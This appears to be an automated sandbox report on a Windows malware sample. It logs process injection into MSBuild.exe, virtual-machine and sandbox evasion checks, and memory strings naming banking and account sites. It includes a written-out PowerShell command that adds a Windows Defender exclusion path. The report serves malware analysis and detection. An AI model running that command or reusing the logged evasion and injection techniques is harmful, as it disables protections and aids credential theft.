                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: uh3ex1.exe PID: 8092, type: MEMORYSTR
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeMemory allocated: 18F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeMemory allocated: 3330000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeMemory allocated: 18F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: 4A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: 5090000 memory reserve | memory write watchJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: 6090000 memory reserve | memory write watchJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: 61C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: 71C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: 7550000 memory reserve | memory write watchJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: 8550000 memory reserve | memory write watchJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: 9550000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4E70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599188Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599078Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598969Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598844Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598735Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598610Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598485Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598360Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598235Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598110Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 597985Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 597567Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 597438Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 597293Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeWindow / User API: threadDelayed 689Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeWindow / User API: threadDelayed 3286Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6032Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3792Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 1584Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 2544Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -599891s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -599438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -599313s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -599188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -599078s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -598969s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -598844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -598735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -598610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -598485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -598360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -598235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -598110s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -597985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -597567s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -597438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 8044Thread sleep time: -597293s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 7992Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exe TID: 7736Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep count: 6032 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep count: 3792 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exe TID: 8144Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6672Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7188Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D59C108 FindFirstFileExW,6_2_6D59C108
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599188Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 599078Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598969Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598844Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598735Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598610Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598485Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598360Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598235Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 598110Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 597985Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 597567Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 597438Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 597293Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1530637839.0000000001539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1530637839.0000000001491000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1669008971.0000000006381000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                      Source: 9LrEuTWP8s.exe, 00000001.00000002.1530637839.0000000001539000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                      Source: MSBuild.exe, 00000008.00000002.1662211642.0000000004021000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0727E7E0 LdrLoadDll,8_2_0727E7E0
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D59BA57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6D59BA57
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D59D82B GetProcessHeap,6_2_6D59D82B
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D5975C1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6D5975C1
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D59BA57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6D59BA57
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D597A9A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6D597A9A
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F00000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F00000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F00000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F02000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F4E000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FBA000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F02000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F4E000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FBA000Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: CF4008Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Path1\To2\Save444'Jump to behavior
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeProcess created: C:\Path1\To2\Save444\uh3ex1.exe "C:\Path1\To2\Save444\uh3ex1.exe" Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Path1\To2\Save444\uh3ex1.exeCode function: 6_2_6D597C58 cpuid 6_2_6D597C58
                      Source: C:\Users\user\Desktop\9LrEuTWP8s.exeQueries volume information: C:\Users\user\Desktop\9LrEuTWP8s.exe VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
